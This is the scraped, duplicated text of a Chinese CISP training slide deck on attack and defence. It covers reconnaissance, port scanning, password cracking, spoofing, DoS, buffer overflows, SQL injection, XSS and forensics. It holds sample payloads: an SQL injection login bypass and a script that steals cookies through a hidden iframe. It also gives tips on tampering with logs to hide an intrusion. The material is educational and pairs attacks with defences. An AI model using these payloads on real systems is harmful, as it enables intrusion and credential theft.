CISP0209安全攻防实践课件_第1页
CISP0209安全攻防实践课件_第2页
CISP0209安全攻防实践课件_第3页
CISP0209安全攻防实践课件_第4页
CISP0209安全攻防实践课件_第5页
已阅读5页,还剩205页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

安全攻防实践培训机构名称讲师名字安全攻防实践培训机构名称课程内容2课程内容2知识域:安全攻防基础知识子域:网络攻击基本概念术语了解黑客攻击的分类:主动攻击、被动攻击理解黑客攻击的常用术语:如后门、0-day、提权、社会工程等知识子域:网络攻击基本流程了解侦查踩点、定位绘制目标、实施攻击、扩大战果、打扫战场等网络攻击的基本步骤了解以上各个阶段常用的攻击手段和工具3知识域:安全攻防基础知识子域:网络攻击基本概念术语3网络攻击基本概念及术语网络攻击的方式主动攻击:扫描、渗透、拒绝服务……被动攻击:嗅探、钓鱼……一些术语后门、RootKit0-day提权社会工程学BoNet(僵尸网络)B/S(Browser/Server)……4网络攻击基本概念及术语网络攻击的方式4攻击的过程5踩点定位入侵留后门抹去痕迹信息收集分析目标实施攻击方便再次进入打扫战场攻击的过程5踩点定位入侵留后门抹去痕迹信息收集踩点-信息收集6具体见后面介绍为什么要收集信息获取攻击目标大概信息网络信息主机信息是否存在漏洞密码脆弱性等等指导下一步攻击行为信息收集的方式社会工程学媒体(如搜索引擎、广告介绍等)网络工具的探测踩点-信息收集6具体见后面介绍为什么要收集信息定位-分析目标为什么需要分析目标确定收集信息的准确性更准确的判断(例如:index.ycs是java开发,开发人员修改了脚本后缀以迷惑攻击者)攻击方式及工具路径的选择分析目标的方法扫描漏洞库论坛等交互应用7定位-分析目标为什么需要分析目标7入侵-多种多样的入侵方式针对配置错误的攻击-IPC$的攻击针对应用漏洞的攻击-unicode缓存溢出攻击-idq缓存溢出电子欺骗攻击-ARP欺骗拒绝服务攻击-synflood针对弱口令的攻击-口令破解利用服务的漏洞-本地输入法漏洞利用应用脚本开发的漏洞-SQL注入利用人的心理-社会工程学攻击……8入侵-多种多样的入侵方式针对配置错误的攻击-IPC$的攻击8后门可以作什么方便下次直接进入监视用户所有行为、隐私完全控制用户主机后门放置方式如果已经入侵简单!如果尚未入侵手动放置利用系统漏洞,远程植入利用系统漏洞,诱骗执行后门-方便下次进入9后门可以作什么后门-方便下次进入9特洛依木马随系统自启动修改注册表服务Ini文件RootKit设备驱动脚本后门难以查找隐藏账号考验管理人员耐心与细心后门-方式10特洛依木马后门-方式10改写访问日志例如:IIS访问日志位置

%WinDir%\System32\LogFiles\W3SVC1\exyymmdd.log改写日志的技巧修改系统日期删除中间文件删除创建的用户抹去痕迹11改写访问日志抹去痕迹11信息收集与密码破解知识子域:攻击目标信息收集了解目标系统网络地址、软件版本等信息获取方式了解网络网络设备、系统软件、应用软件扫描攻击的常用工具知识子域:密码破解原理与实例了解暴力破解和字典攻击的常用技术和工具12信息收集与密码破解知识子域:攻击目标信息收集12信息收集技术公开信息的合理利用及分析IP及域名信息收集主机及系统信息收集系统服务信息的收集系统、服务及应用漏洞信息收集13信息收集技术公开信息的合理利用及分析13信息收集技术-公开信息的分析公开信息的合理利用和分析-信息后面能反馈出什么?

从著名的”照片泄密”案件到“如何用google入侵网站”

1964年《中国画报》封面衣着判断:北纬46度至48度的区域-齐齐哈尔与哈尔滨之间所握手柄的架式->油井的直径钻井与背后油田间的距离和井架密度->储量和产量因此设计出适合中国大庆的设备,一举中标14信息收集技术-公开信息的分析公开信息的合理利用和分析-信息后信息收集技术-搜索引擎网站信息举例:某网络提供商在其网站上宣传

“特惠服务器租用:RedHatLinux8.0支持MYSQL/PHP采用性能优异的Apache1.3.XXWeb服务器”搜索引擎Google搜索 例:某Web服务器存在致命错误脚本“5sf67.jsp”

攻击者可通过搜索引擎查找存在该错误脚本的网站15信息收集技术-搜索引擎网站信息15信息收集技术-域名与IP查询16域名与IP信息收集─WhoisWhois是一个标准服务,可以用来查询域名是否被注册以及注册的详细资料

Whois可以查询到的信息域名所有者域名及IP地址对应信息联系方式域名到期日期域名注册日期域名所使用的DNSServers……信息收集技术-域名与IP查询16域名与IP信息收集─Who信息收集技术-域名与IP查询17域名与IP查询─nslookup

操作系统自带命令,主要是用来查询域名名称和IP之间的对应关系网络状况查询─Ping系统自带命令,测试与远端电脑或网络设备的连接状况网络路径状况查询─tracert系统自带命令,测试与远端电脑或网络设备之间的路径信息收集技术-域名与IP查询17域名与IP查询─nsloo信息收集技术-系统鉴别1.DNS的hinfo纪录2.Bannergrab3.二进制文件法4.TCP/IP协议栈检测法5.Icmp堆栈指纹技术18信息收集技术-系统鉴别1.DNS的hinfo纪录18系统鉴别-DNS的hinfo记录19系统鉴别-DNS的hinfo记录19系统鉴别-服务旗标检测服务旗标检测法

[root@pooh]#telnet3DebianGNU/Linux2.1targetlogin:Redhat:/etc/issue、/etc/bsd:/etc/motdSolaris:/etc/motd缺陷:不准确,负责任的管理员一般都修改这个文件20FTP回显信息操作系统回显Web回显信息系统鉴别-服务旗标检测服务旗标检测法20FTP回显信息操作系系统鉴别-二进制文件分析法得到远程系统的一个二进制文件例如1.webserver目录下产生的core文件2.配置不当的ftpserver下的二进制文件……利用file、readelf命令等来鉴别21系统鉴别-二进制文件分析法得到远程系统的一个二进制文件21系统鉴别-TCP/IP协议栈检测法其原理是不同厂家的IP协议栈实现之间存在许多细微的差别,通过这些差别就能对目标系统的操作系统加以猜测。主动检测被动检测22系统鉴别-TCP/IP协议栈检测法其原理是不同厂家的IP协议系统鉴别-ICMP堆栈指纹技术23系统鉴别-ICMP堆栈指纹技术23通过端口扫描确定主机开放的端口,不同的端口对应运行着的不同的网络服务端口测试数据包测试响应数据包信息收集技术-端口扫描我知道主机上开放的端口了24通过端口扫描确定主机开放的端口,不同的端口对应端口测试数据包端口扫描类型常规扫描(tcpconnectscan)半打开扫描(tcpsynscan)隐秘扫描(StealthScan)SYN/ACKscan:发送一个SYN/ACK分组,测知防火墙的规则设计。它可确定防火墙是否只是简单的分组过滤(只允许已建立好的连接);还是一个基于状态的防火墙(可执行高级的分组过滤)FINscan:发送FIN分组,目标系统应给所有关闭着的端口发回一个RST分组,这种技巧通常只工作在基于UNIX的TCP/IP协议上;Xmasscan:这一技巧是往目标端口发送一个FIN、URG、PUSH置位的分组,如果目标端口关闭,则返回一个RST分组;Nullscan:发送所有标识位复位的TCP分组;UDP扫描25端口扫描类型常规扫描(tcpconnectscan)25端口扫描-常规扫描26扫描的方法─TCPConnectScan主要是利用TCP三次握手(Three-wayhandshaking)的连接方式來达到扫描的目的AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPConnectScan端口扫描-常规扫描26扫描的方法─TCPConnec端口扫描-半打开扫描27扫描的方法─TCPSYNScan沒有完成三次握手如左上图,当主机

A收到主机

B的回应后,並不会回传

ACK数据包给主机

B

。TCPSYNScan的优缺点优点:由于沒有完成TCP三次握手,所以不会在目标主机上留下记录。缺点:需有管理者的权限才可执行TCPSYNScan(以左上图为例,必需要有主机

A的管理者权限)。AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPSYNScan端口扫描-半打开扫描27扫描的方法─TCPSYNSc端口扫描-UDP扫描28扫描的方法─UDPPortScan由扫描主机发出UDP数据包给目标主机的UDPPort,並等待目标主机

Port送回ICMPUnreachable信息。若收到目标主机Port传回的ICMPUnreachable信息,则表示该

Port处于关闭的状态。若沒有收到目标主机Port传回的ICMPUnreachable信息,则表示该Port可能处于Listen状态。UDPPortScan的缺点UDP协议不可靠可能被防火墙过滤掉使用Nmap做

udpScan端口扫描-UDP扫描28扫描的方法─UDPPort端口扫描策略随机端口扫描慢扫描碎片扫描欺骗扫描协同扫描29端口扫描策略随机端口扫描29信息收集技术-漏洞扫描根据目标主机开放的不同应用和服务来扫描和判断是否存在或可能存在某些漏洞意义进行网络安全评估为网络系统的加固提供先期准备被网络攻击者加以利用来获取重要的数据信息30对一个信息系统来说,它的安全性不在于它是否采用了最新的加密算法或最先进的设备,而是由系统本身最薄弱之处,即漏洞所决定的。只要这个漏洞被发现,系统就有可能成为网络攻击的牺牲品。信息安全的“木桶理论”信息收集技术-漏洞扫描根据目标主机开放的不同应用和服务来扫描31信息收集技术-漏洞扫描工具网络设备漏洞扫描器CiscoAuditingTools集成化的漏洞扫描器NessusShadowSecurityScannereEye的RetinaInternetSecurityScannerGFILANguard

专业web扫描软件IBMappscanAcunetixWebVulnerability数据库漏洞扫描器ISSDatabaseScanneroscanner Oracle数据库扫描器Metacoretex

数据安全审计工具31信息收集技术-漏洞扫描工具网络设备漏洞扫描器工具介绍-端口扫描Nmap简介被称为“扫描器之王”有forUnix和forWin的两种版本需要Libpcap库和Winpcap库的支持能够进行普通扫描、各种高级扫描和操作系统类型鉴别等使用-sS:半开式扫描-sT:普通connect()扫描-sU:udp端口扫描-O:操作系统鉴别-P0:强行扫描(无论是否能够ping通目标)-p:指定端口范围-v:详细模式32工具介绍-端口扫描Nmap32工具介绍-端口扫描SuperScan简介基于Windows平台速度快,图形化界面使用傻瓜化33工具介绍-端口扫描SuperScan33漏洞扫描工具Nessus构架服务器端:基于Unix系统客户端:有GTK、Java和Win系统支持运作客户端连接服务器端,并下载插件和扫描策略真正的扫描由服务器端发起两者之间的通信通过加密认证优势:具有强大的插件功能完全免费,升级快速非常适合作为网络安全评估工具34漏洞扫描工具Nessus34漏洞扫描工具X-Scan国产自主开发完全免费比较古老,缺乏维护35漏洞扫描工具X-Scan35web扫描工具IBMAppScan36web扫描工具IBMAppScan36AcunetixWebVulnerabilityScanner优秀的Web安全测试软件37AcunetixWebVulnerabilitySca密码破解-利用人性懒惰38密码破解方法

还原

暴力破解密码工具

密码暴力破解工具

密码字典生成工具

密码破解-利用人性懒惰38密码破解方法密码破解-密码穷举39密码明文对明文密码进行加密对比密文更换密码明文已知密码加密算法及密文情况下的破解方法密码破解-密码穷举39密码明文对明文密码进行加密对比密文更换ID:cisppsw:123456Ok,youcanlogininID:cisppsw:No,youcannotloginin112123123412345123456OK,youcanlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotloginin密码破解-口令暴力猜解40ID:cisppsw:123456Ok,youcanl破解工具JohntheRipperL0Phtcrack……41破解工具JohntheRipper41字典生成器42根据用户规则快速生成各类密码字典攻击者常用的工具……字典生成器42根据用户规则快速生成各类密码字典欺骗攻击与拒绝服务攻击43知识子域:欺骗攻击原理与实例理解IP欺骗、ARP欺骗、DNS欺骗的原理和危害了解防范欺骗攻击的基本方法知识子域:拒绝服务工具原理与实例理解SYNFlood、UDPFlood、Land攻击、TearDrop攻击等典型DoS攻击的原理及危害理解DDoS攻击的原理了解防范DoS/DDoS攻击的基本方法欺骗攻击与拒绝服务攻击43知识子域:欺骗攻击原理与实例欺骗攻击定义BACHello,I’mB!欺骗攻击(Spoofing)是指通过伪造源于可信任地址的数据包以使一台机器认证另一台机器的复杂技术

44欺骗攻击定义BACHello,I’mB!欺骗攻击(Spoo欺骗攻击的主要方式IP欺骗DNS欺骗ARP欺骗TCP会话劫持路由欺骗……45欺骗攻击的主要方式IP欺骗45客户服务器Synsend连接请求回应(ISN)Syn+ack确认(ISN+1)会话过程46IP欺骗基础知识-三次握手客户服务器Synsend连接请求回应(ISN)Syn+acIP欺骗实现步骤IP欺骗攻击方法中包括了一系列攻击步骤确认攻击目标使要冒充主机无法响应目标主机猜正确的序数冒充受信主机进行会话47IP欺骗实现步骤IP欺骗攻击方法中包括了一系列攻击步骤确认攻IP欺骗实例讲解BAC同步flood攻击

连接请求伪造B进行系列会话A的序数规则48IP欺骗实例讲解BAC同步flood攻击连接请求伪造B进行防止IP欺骗49严格设置路由策略:拒绝来自网上,且声明源于本地地址的包使用最新的系统和软件,避免会话序号被猜出使用抗IP欺骗功能的产品严密监视网络,对攻击进行报警防止IP欺骗49严格设置路由策略:拒绝来自网上,且声明源于本ARP欺骗基础-Arp协议工作过程Bb:bbCc:ccAa:aaWho’sIPisWho’sIPisMACBb:bbisIsee,Iwillcache50ARP欺骗基础-Arp协议工作过程Bb:bbCc:ccAa:ARP欺骗实现Bb:bbCc:ccAa:aaMACcc:ccisIsee,IwillcacheMACdf:dfisIcouldn’tfind51ARP欺骗实现Bb:bbCc:ccAa:aa2ARP欺骗防御52使用静态ARP缓存IP与MAC地址绑定ARP防御工具ARP欺骗防御52使用静态ARP缓存DNS欺骗基础-DNS协议工作过程其他DNSIwillcacheIdon’tknow,Iwillaskother

It’sinmycache53DNS欺骗基础-DNS协议工作过程其他DNSIDNS欺骗实现Idon’tknow,IwillaskotherOtherDNSIwillcacheIt’sinmycache54DNS欺骗实现Idon’tknow,IwillaskDNS欺骗防御55安装最新版本的DNS软件关闭DNS服务递归功能限制域名服务器作出响应的地址限制域名服务器作出响应的递归请求地址限制发出请求的地址DNS欺骗防御55安装最新版本的DNS软件其他欺骗攻击-路由欺骗ICMP重定向报文欺骗RIP路由欺骗源径路由欺骗56其他欺骗攻击-路由欺骗ICMP重定向报文欺骗56拒绝服务攻击定义拒绝服务式攻击(DenialofService),顾名思义就是让被攻击的系统无法正常进行服务的攻击方式。拒绝服务攻击方式利用大量数据挤占网络带宽利用大量请求消耗系统性能利用协议实现缺陷利用系统处理方式缺陷57拒绝服务攻击定义拒绝服务式攻击(DenialofServ典型的拒绝服务攻击方式SYNFloodUDPFloodTeardropLANDSmurf……58典型的拒绝服务攻击方式SYNFlood58(syn)Hello,I’mhere(syn+ack)I’mready?I’mwaiting……SYNFlood(syn)Hello,I’mhere?I’mwaiting……(syn)Hello,I’mhere……I’mwaiting……I’mwaiting……I’mwaiting……(syn)Hello,I’mhere(syn+ack)UDPFLOODUDPFlood1)大量UDP小包冲击应用服务器(DNS、Radius认证等)2)利用系统服务形成流量(Echochargen)3)利用正常UDP服务发送大流量形成网络拥塞60UDPFLOODUDPFlood60LAND攻击运用IPSpoofing技术送出一连串SYN数据包给目标主机,让目标主机系统误以为这些数据包是由自己发送的。由于目标主机在处理这些数据包的时候,它自己并无法回应给自己SYN-ACK数据包,因而造成系统当机。611(SYN)hello,I’m1Syn+AckAckLAND攻击运用IPSpoofing技术送出一连串SSYNSYN+ACKACKPSH1:1025……PSH1025:2049……PSH2049:3073……FINACKPSH1:1025……PSH

1000:2049……PSH2049:3073……试图重组时主机崩溃TearDrop(分片攻击)62SYNSYN+ACKACKPSH1:1025……PSH1Smurf攻击黑客伪装受害者IP中间网站目标子网络主机目标子网络主机目标子网络主机攻击信息大量ICMP封包(Layer3)子网络主机子网络主机子网络主机目标网站大量广播(Layer2)63Smurf攻击黑客中间网站目标子网络主机目标子网络主机目标子拒绝服务攻击的危害消耗带宽瘫痪服务器DNS网页电子邮件阻塞网络路由器交换器64拒绝服务攻击的危害64DDoS攻击原理65DDoS攻击原理65工具介绍TFN2KTrinoo663133527665

27444

udpmaster

client..主机列表telnet

betaalmostdone

攻击指令目标主机nc

工具介绍TFN2K663133527444udpmaste拒绝服务攻击防御定期扫描过滤不必要的端口与服务节点配置防火墙/DDOS设备过滤IP地址限制SYN/ICMP流量检查来源67拒绝服务攻击防御67缓存溢出与网页脚本安全68知识子域:缓冲区溢出原理与实例理解缓冲区溢出的原理和危害了解防范缓冲区溢出的基本方法知识子域:网页脚本原理与实例理解SQL注入攻击的原理和危害了解防范SQL注入攻击的基本方法理解跨站脚本攻击的原理和危害了解防范跨站脚本攻击的基本方法知识子域:计算机取证了解计算机取证的概念和作用了解计算机取证的原则、基本步骤、常用方法和工具缓存溢出与网页脚本安全68知识子域:缓冲区溢出原理与实例缓存溢出缓存溢出基础缓存溢出原理缓存溢出简单示例缓冲区溢出防御69缓存溢出缓存溢出基础69缓存溢出—十年来攻与防的焦点70

原理

缓存溢出攻击利用编写不够严谨的程序,通过向程序的缓存区写入超过预定长度的数据,造成缓存的溢出,从而破坏程序的堆栈,导致程序执行流程的改变。

基础知识寄存器堆栈指针

缓存溢出—十年来攻与防的焦点70 缓存溢出基础-寄存器71寄存器说明功能eax累加器加法乘法指令的缺省寄存器,函数返回值ebx基址寄存器在内存寻址时存放基地址ecx计数器REP和LOOP指令的内定计数器edx除法寄存器存放整数除法产生的余数esi/edi源/目标索引寄存器在字符串操作指令中,ds:esi指向源字符串,es:edi指向目标字符串ebp栈底指针寄存器ss:ebp当前堆栈的栈底指针esp栈顶指针寄存器ss:esp当前堆栈的栈顶指针eip指令寄存器cs:eip指向下一条指令的地址eflags标志寄存器标志寄存器cs代码段寄存器当前执行的代码段ds数据段寄存器当前数据段ss堆栈段寄存器当前堆栈段缓存溢出基础-寄存器71寄存器说明功能eax累加器加法乘法指缓存溢出基础-堆栈及指针堆栈概念一种后进先出的数据结构堆栈特点后进先出堆栈生长方向与内存地址方向相反指针指针是指向内存单元的地址34H12H78H56H0108HESP栈顶堆栈(AL)(AH)34H12H78H56H0106HESP栈顶72栈底栈底缓存溢出基础-堆栈及指针堆栈概念34H12H78H56H01简单示例Buffer.c#include<stdio.h>intmain(){

charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}73程序作用:将用户输入的内容打印在屏幕上简单示例Buffer.c73程序作用:简单示例74简单示例74简单示例由于返回地址已经被覆盖,函数执行返回地址时会将覆盖内容当作返回地址,然后试图执行相应地址的指令,从而产生错误。75当我们全部输入a时,错误指令地址为0x616161,0x61是a的ASCII编码简单示例由于返回地址已经被覆盖,函数执行返回地址时会将75当76缓存溢出危害寻找程序漏洞编制缓存溢出程序精确控制跳转地址执行设定的代码获得系统权限或破坏系统危害:如果可精确控制内存跳转地址,就可以执行指定代码,获得权限或破坏系统76缓存溢出危害寻找程序漏洞编制缓存溢出程序精确控制跳转地址缓存溢出防御使用安全的字符串操作函数编写安全代码输入数据验证(过滤)指针完整性检查第三方软件防御……77缓存溢出防御使用安全的字符串操作函数77缓冲区溢出—演示78演示缓存溢出或缓存溢出深入讲解,讲师如可演示缓存溢出,请替换此页,如无法演示,请删除此页缓冲区溢出—演示78演示缓存溢出或缓存溢出深入讲解,讲师如可网页脚本安全脚本安全的概念SQL注入原理及危害跨站脚本原理及危害79网页脚本安全79概念脚本攻击是针对Web应用的攻击脚本攻击主要是针对动态网站进行的攻击,其原因是在建立动态网页的过程中没有对用户的输入输出进行有效的合法性验证动态网站交互性:即网页会根据用户的要求和选择而动态改变和响应,将浏览器作为客户端界面自动更新:即无须手动地更新HTML文档,便会自动生成新的页面,可以大大节省工作量因时因人而变:即当不同的时间、不同的人访问同一网址时会产生不同的页面80概念80脚本分类静态脚本HTML动态脚本aspphpjspvbs…81脚本分类静态脚本81SQL注入SQL注入(SQLInjection):程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作,操作系统Web应用数据库服务器123调用数据库查询直接调用操作系统命令通过数据库调用操作系统命令82SQL注入SQL注入(SQLInjeSQL注入基础知识SQL(StructuredQueryLanguage):结构化的查询语言,是关系型数据库通讯的标准语言。查询:Selectstatementfromtablewherecondition删除记录:deletefromtablewherecondition更新记录:updatetablesetfield=valuewherecondtion添加记录:insertintotablefieldvalues(values)常用函数Count()Asc(‘nchar’),unicode(‘nchar’)mid(str,n1,n2),substring(str,n1,n2)8383SQL注入基础知识SQL(StructuredQuerySQL注入简单示例Select*fromtablewhereuser=‘admin’andpwd=‘SdfG#345!’;adminSdfG#345!84Select*fromtablewhereuser=‘admin’andpwd=‘123’or‘1=1’admin123’or‘1=1由于密码的输入方式,使得查询语句返回值永远为True,因此通过验证SQL注入简单示例Select*fromtablewSQL注入范例-收集信息85http://xx.xxx.xx.xx/playnews.asp?id=772’and‘1=1MicrosoftOLEDBProviderforODBCDrivers错误'80040e14'[Microsoft][ODBCMicrosoftAccessDriver]字符串的语法错误在查询表达式'id=772''中。/displaynews.asp,行31说明:

数据库为Access

程序没有对于id进行过滤数据库表中有个字段名为idSQL注入范例-收集信息85http://xx.xxx.xxSQL注入范例-操作数据库SQL注入范例-操作数据库SQL注入范例-执行系统命令87SQL注入范例-执行系统命令8788SQL注入防御开发时过滤特殊字符:单引号、双引号、斜杠、反斜杠、冒号、空字符等的字符过滤的对象:用户的输入提交的URL请求中的参数部分从cookie中得到的数据部署防SQL注入系统或脚本88SQL注入防御开发时过滤特殊字符:跨站脚本定义跨站脚本(CSS-CrossSiteScripting)在远程Web页面的HTML代码中插入的具有恶意目的的数据,用户认为该页面是可信的,但是当浏览器下载该页面时,嵌入其中的脚本将被解释执行跨站脚本成因CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。这种攻击利用的是用户和服务器之间的信任关系,以及Web站点没有使用有效的输入输出验证来拒绝嵌入的脚本。89跨站脚本定义89跨站脚本原因90跨站脚本原因90跨站脚本危害1.获取其他用户Cookie中的敏感数据2.屏蔽页面特定信息3.伪造页面信息4.拒绝服务攻击5.突破外网内网不同安全设置6.与其它漏洞结合7.其它

91跨站脚本危害1.获取其他用户Cookie中的敏感数据91跨站脚本范例-执行Javascript有很多种方式可造成Javascript的执行,以下举例两种最原始的范例如下:

第二种方式,利用expression指令来造成javascript执行,范例如下:

92body{background-image:url("javascript:alert('XSS')");}body{background-image:expression(alert("XSS"));}跨站脚本范例-执行Javascript92body{bac跨站脚本危害范例-Cookies窃取93Web服务器URL大小为0的iframe将字符编码传送varcode;vartarget="/?";

info=escape(document.cookie);target=target+info;code="<iframestyle='display:none;'src=";code=code+target;code=code+"width=0height=0></iframe>";document.write(code);跨站脚本危害范例-Cookies窃取93大小为0的ifram跨站脚本危害-窃取Cookies更改Cookies成功获取身份94跨站脚本危害-窃取Cookies更改Cookies成功获取身总结脚本攻击从本质上是一种过滤不足造成的攻击脚本是不需要编译的程序代码,依赖脚本引擎来解释执行,具有很好的操作系统适应性和可移植性如果不可信的内容被引入到动态页面中,则无论是网站还是客户机都没有足够的信息识别这种情况的发生并采取保护措施脚本攻击方法主要包括:SQL注入攻击、跨站脚本攻击等95总结脚本攻击从本质上是一种过滤不足造成的攻击95计算机取证计算机取证概念计算机取证遵循原则计算机取证步骤计算机取证技术和工具96计算机取证计算机取证概念96计算机取证的概念什么是计算机取证计算机取证是使用软件和工具,按照一些预先定义的程序全面地检查计算机系统,以提取和保护有关计算机犯罪的证据。为什么需要取证通过证据查找肇事者通过证据推断犯罪过程通过证据判断受害者损失程度收集证据提供法律支持97计算机取证的概念什么是计算机取证97计算机取证的原则合法原则取证必须符合相关法律法规充分授权原则取证必须得到充分授权优先保护证据原则取证可能导致证据破坏,必须优先考虑保护证据全程监督原则整个取证过程应全程第三方监督98计算机取证的原则合法原则98计算机取证的步骤99准备保护提取分析提交计算机取证的步骤99准备保护提取分析提交计算机取证-准备获取授权取证工作获得明确的授权(授权书)目标明确对取证的目的有清晰的认识工具准备对取证环境的了解及需要准备的工具软件准备对取证的软件进行过有效的验证介质准备确保有符合要求的干净的介质可用于取证100计算机取证-准备获取授权100计算机取证-保护保证数据安全性制作磁盘映像-不在原始磁盘上操作保证数据完整性取证中不使用可能破坏完整性的操作第三方监督所有操作都有第三方在场监督101计算机取证-保护保证数据安全性101计算机取证-提取102优先分析易消失的证据内存信息、系统进程、网络连接信息、路由信息、临时文件、缓存文件系统数据恢复、隐藏文件、加密文件、系统日志应用系统系统日志计算机取证-提取102优先分析易消失的证据计算机取证-分析及提交证据在什么地方?日志、删除的文件、临时文件、缓存从证据中能发现什么?如何关联证据?电子取证提交必须与现实取证结合,文档化很重要103计算机取证-分析及提交证据在什么地方?103计算机取证工具开放源代码软件Coroners工具包,它是计算机犯罪取证检查的一些工具软件的集合。商业软件取证软件Encase——基于Windows平台,提供从数据发现到分析到生成报表的全面的解决方案;AccessData,用于获取口令的软件;以及ThumbsPlus,Snapback…NetThreatAnalyzer:NTI公司的软件系统104计算机取证工具开放源代码软件104谢谢,请提问题!谢谢,请提问题!安全攻防实践培训机构名称讲师名字安全攻防实践培训机构名称课程内容107课程内容2知识域:安全攻防基础知识子域:网络攻击基本概念术语了解黑客攻击的分类:主动攻击、被动攻击理解黑客攻击的常用术语:如后门、0-day、提权、社会工程等知识子域:网络攻击基本流程了解侦查踩点、定位绘制目标、实施攻击、扩大战果、打扫战场等网络攻击的基本步骤了解以上各个阶段常用的攻击手段和工具108知识域:安全攻防基础知识子域:网络攻击基本概念术语3网络攻击基本概念及术语网络攻击的方式主动攻击:扫描、渗透、拒绝服务……被动攻击:嗅探、钓鱼……一些术语后门、RootKit0-day提权社会工程学BoNet(僵尸网络)B/S(Browser/Server)……109网络攻击基本概念及术语网络攻击的方式4攻击的过程110踩点定位入侵留后门抹去痕迹信息收集分析目标实施攻击方便再次进入打扫战场攻击的过程5踩点定位入侵留后门抹去痕迹信息收集踩点-信息收集111具体见后面介绍为什么要收集信息获取攻击目标大概信息网络信息主机信息是否存在漏洞密码脆弱性等等指导下一步攻击行为信息收集的方式社会工程学媒体(如搜索引擎、广告介绍等)网络工具的探测踩点-信息收集6具体见后面介绍为什么要收集信息定位-分析目标为什么需要分析目标确定收集信息的准确性更准确的判断(例如:index.ycs是java开发,开发人员修改了脚本后缀以迷惑攻击者)攻击方式及工具路径的选择分析目标的方法扫描漏洞库论坛等交互应用112定位-分析目标为什么需要分析目标7入侵-多种多样的入侵方式针对配置错误的攻击-IPC$的攻击针对应用漏洞的攻击-unicode缓存溢出攻击-idq缓存溢出电子欺骗攻击-ARP欺骗拒绝服务攻击-synflood针对弱口令的攻击-口令破解利用服务的漏洞-本地输入法漏洞利用应用脚本开发的漏洞-SQL注入利用人的心理-社会工程学攻击……113入侵-多种多样的入侵方式针对配置错误的攻击-IPC$的攻击8后门可以作什么方便下次直接进入监视用户所有行为、隐私完全控制用户主机后门放置方式如果已经入侵简单!如果尚未入侵手动放置利用系统漏洞,远程植入利用系统漏洞,诱骗执行后门-方便下次进入114后门可以作什么后门-方便下次进入9特洛依木马随系统自启动修改注册表服务Ini文件RootKit设备驱动脚本后门难以查找隐藏账号考验管理人员耐心与细心后门-方式115特洛依木马后门-方式10改写访问日志例如:IIS访问日志位置

%WinDir%\System32\LogFiles\W3SVC1\exyymmdd.log改写日志的技巧修改系统日期删除中间文件删除创建的用户抹去痕迹116改写访问日志抹去痕迹11信息收集与密码破解知识子域:攻击目标信息收集了解目标系统网络地址、软件版本等信息获取方式了解网络网络设备、系统软件、应用软件扫描攻击的常用工具知识子域:密码破解原理与实例了解暴力破解和字典攻击的常用技术和工具117信息收集与密码破解知识子域:攻击目标信息收集12信息收集技术公开信息的合理利用及分析IP及域名信息收集主机及系统信息收集系统服务信息的收集系统、服务及应用漏洞信息收集118信息收集技术公开信息的合理利用及分析13信息收集技术-公开信息的分析公开信息的合理利用和分析-信息后面能反馈出什么?

从著名的”照片泄密”案件到“如何用google入侵网站”

1964年《中国画报》封面衣着判断:北纬46度至48度的区域-齐齐哈尔与哈尔滨之间所握手柄的架式->油井的直径钻井与背后油田间的距离和井架密度->储量和产量因此设计出适合中国大庆的设备,一举中标119信息收集技术-公开信息的分析公开信息的合理利用和分析-信息后信息收集技术-搜索引擎网站信息举例:某网络提供商在其网站上宣传

“特惠服务器租用:RedHatLinux8.0支持MYSQL/PHP采用性能优异的Apache1.3.XXWeb服务器”搜索引擎Google搜索 例:某Web服务器存在致命错误脚本“5sf67.jsp”

攻击者可通过搜索引擎查找存在该错误脚本的网站120信息收集技术-搜索引擎网站信息15信息收集技术-域名与IP查询121域名与IP信息收集─WhoisWhois是一个标准服务,可以用来查询域名是否被注册以及注册的详细资料

Whois可以查询到的信息域名所有者域名及IP地址对应信息联系方式域名到期日期域名注册日期域名所使用的DNSServers……信息收集技术-域名与IP查询16域名与IP信息收集─Who信息收集技术-域名与IP查询122域名与IP查询─nslookup

操作系统自带命令,主要是用来查询域名名称和IP之间的对应关系网络状况查询─Ping系统自带命令,测试与远端电脑或网络设备的连接状况网络路径状况查询─tracert系统自带命令,测试与远端电脑或网络设备之间的路径信息收集技术-域名与IP查询17域名与IP查询─nsloo信息收集技术-系统鉴别1.DNS的hinfo纪录2.Bannergrab3.二进制文件法4.TCP/IP协议栈检测法5.Icmp堆栈指纹技术123信息收集技术-系统鉴别1.DNS的hinfo纪录18系统鉴别-DNS的hinfo记录124系统鉴别-DNS的hinfo记录19系统鉴别-服务旗标检测服务旗标检测法

[root@pooh]#telnet3DebianGNU/Linux2.1targetlogin:Redhat:/etc/issue、/etc/bsd:/etc/motdSolaris:/etc/motd缺陷:不准确,负责任的管理员一般都修改这个文件125FTP回显信息操作系统回显Web回显信息系统鉴别-服务旗标检测服务旗标检测法20FTP回显信息操作系系统鉴别-二进制文件分析法得到远程系统的一个二进制文件例如1.webserver目录下产生的core文件2.配置不当的ftpserver下的二进制文件……利用file、readelf命令等来鉴别126系统鉴别-二进制文件分析法得到远程系统的一个二进制文件21系统鉴别-TCP/IP协议栈检测法其原理是不同厂家的IP协议栈实现之间存在许多细微的差别,通过这些差别就能对目标系统的操作系统加以猜测。主动检测被动检测127系统鉴别-TCP/IP协议栈检测法其原理是不同厂家的IP协议系统鉴别-ICMP堆栈指纹技术128系统鉴别-ICMP堆栈指纹技术23通过端口扫描确定主机开放的端口,不同的端口对应运行着的不同的网络服务端口测试数据包测试响应数据包信息收集技术-端口扫描我知道主机上开放的端口了129通过端口扫描确定主机开放的端口,不同的端口对应端口测试数据包端口扫描类型常规扫描(tcpconnectscan)半打开扫描(tcpsynscan)隐秘扫描(StealthScan)SYN/ACKscan:发送一个SYN/ACK分组,测知防火墙的规则设计。它可确定防火墙是否只是简单的分组过滤(只允许已建立好的连接);还是一个基于状态的防火墙(可执行高级的分组过滤)FINscan:发送FIN分组,目标系统应给所有关闭着的端口发回一个RST分组,这种技巧通常只工作在基于UNIX的